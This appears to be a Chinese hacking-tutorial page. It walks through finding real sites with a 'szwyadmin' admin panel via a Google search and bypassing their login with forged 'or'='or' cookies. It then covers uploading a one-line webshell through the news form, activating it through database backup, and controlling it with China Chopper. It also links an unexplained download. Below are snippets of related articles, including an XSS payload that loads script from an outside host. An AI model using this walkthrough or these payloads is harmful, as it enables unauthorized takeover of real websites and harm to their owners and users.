google:关键字:inurl:szwyadmin/login.asp
打开任意一个搜索结果,打开后台登录界面后,在地址栏中全部替换成下面代码:
javascript:alert(document.cookie=”adminuser=”+escape(“‘or’='or’”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’='or’”));javascript:alert(document.cookie=”admindj=”+escape(“1″));
如果以上的代码不能使用请下载:http://pan.baidu.com/s/11PuhB
然后关闭此页面
再次打开后台登录界面
在地址栏中把login.asp改为admin_index.asp
就直接进入后台了。
进入后台后在添加新闻的地方上传一句话后,复制链接地址:
然后点击备份如下图:
然后点击备份数据,备份成功后得到地址:
拿起菜刀链接:
xss跨站脚本攻击汇集 (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>...
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,...
最普遍的安全威胁来自内部,同时这些威胁通常都是致命的,其破坏性也远大于外部威胁。其中网络嗅探对于安全防护一般的网络来说,操作简单的同时威胁巨大,很多黑客也使用嗅探器进行网络入侵的渗透.. 网络嗅探器对...
关于Burp Suite: Burp Suite 是用于渗透测试web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快渗透应...
什么叫Retina? Retina是安全性制造行业最受尊重和业内认证的漏洞检测程序流程之一,是大家的漏洞管理解决方法的模块。沒有更强的挑选来维护您的互联网免遭系统漏洞的进攻。 Reti...
什么叫HP Webinspect? WebInspect是另一个Web程序运行安全风险评估专用工具,可协助鉴别Web程序运行层中的己知和不明的系统漏洞。此专用工具还能够协助查验Web服务端是不是恰当...